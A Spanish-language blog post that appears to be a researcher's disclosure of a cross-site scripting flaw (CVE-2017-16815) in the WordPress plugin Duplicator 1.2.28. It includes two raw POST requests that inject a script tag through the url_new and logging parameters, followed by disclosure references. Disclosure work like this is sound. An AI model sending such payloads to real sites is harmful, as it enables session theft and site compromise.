Sigo encontrando Cross-site scripting en plugins de wordpress, voy a tener que automatizarlo de alguna manera :).
En este caso en un plugin llamado «Duplicator Migration» versión 1.2.28
(https://es.wordpress.org/plugins/duplicator/) que se encuentra activo en más de 1 millón de wordpress y está desarrollada por la empresa Snapcreek (https://snapcreek.com).
Se puede explotar usando dos vectores de ataque:
Desde el archivo view.step4.php:
POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1 Host: localhost Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.8 Cookie: Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 39 url_new="><script>alert(1)</script>demo
Desde el archivo view.step2.php:
POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step2.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.8 Cookie: Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 37 logging="><script>alert(1)</script>demo
Siento no mostrar ninguna captura de la ejecución del XSS pero no tuve la necesidad de hacerla ya que los desarrolladores de Snapcreek no me la pidieron.
- Agradecimiento del desarrollador:
https://snapcreek.com/duplicator/docs/changelog (apartado Lite) - Publicación en Packetstormsecurity:
https://packetstormsecurity.com/files/144914/WordPress-Duplicator-Migration-1.2.28-Cross-Site-Scripting.html - CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16815